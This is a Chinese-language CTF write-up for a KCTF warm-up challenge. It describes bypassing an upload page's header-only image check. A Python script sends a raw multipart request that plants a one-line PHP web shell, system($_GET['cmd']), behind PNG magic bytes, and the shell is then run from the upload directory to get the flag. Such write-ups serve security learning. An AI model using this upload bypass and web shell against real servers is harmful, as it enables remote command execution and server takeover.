-
-
[原创]KCTF 签到题 逐光启航 WriteUP
-
发表于: 2024-8-21 16:10 1162
-
查看题目主页可以找到hint.php的链接;
查看hint.php的网页源代码可以发现base64编码的 hidden_page.php
访问发现为上传页面, 上传文件提示只接受.jpg .png文件
测试发现对上传文件的格式检测基于文件头且不限制后缀, 可以构造php文件上传
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | def sendraw(host, port, data, tls = False ): import ssl, socket from http.client import HTTPResponse s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) if tls: s = ssl.wrap_socket(s) if isinstance (data, str ): data = data.encode( 'latin-1' ) s.sendall(data) resp = HTTPResponse(s) resp.begin() res = resp.read() s.close() return res header_part1 = b 'POST /hidden_page.php HTTP/1.1\r\nHost: 0bfdcec0-7c78-45ba-a7b9-1c58ac076038.node.pediy.com:81\r\nContent-Length: ' header_part2 = b '\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: http://0bfdcec0-7c78-45ba-a7b9-1c58ac076038.node.pediy.com:81\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nReferer: http://0bfdcec0-7c78-45ba-a7b9-1c58ac076038.node.pediy.com:81/hidden_page.php\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7\r\nConnection: close\r\n\r\n' data_part1 = b '------WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nContent-Disposition: form-data; name="upload_file"; filename="test.php"\r\nContent-Type: image/png\r\n\r\n' data_part2 = b '\r\n------WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nContent-Disposition: form-data; name="submit"\r\n\r\n\xe4\xb8\x8a\xe4\xbc\xa0\r\n------WebKitFormBoundarydhHx9Ablqmk1ZA7n--\r\n' data = open ( 'anypic.png' , 'rb' ).read()[: 8 ] + b '<?php system($_GET[\'cmd\']); ?>' data = data_part1 + data + data_part2 payload = header_part1 + str ( len (data)).encode( 'latin1' ) + header_part2 + data r = sendraw( '123.57.66.184' , 81 , payload) |
之后发现题目存在upload目录, 访问upload/test.php
可以访问到上传的php shell
得到flag flag{a7031be5-c28f-4c14-ad3d-9a763702c05d}
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2024-9-6 13:22
被tacesrever编辑
,原因:
赞赏
他的文章
看原图
赞赏
雪币:
留言: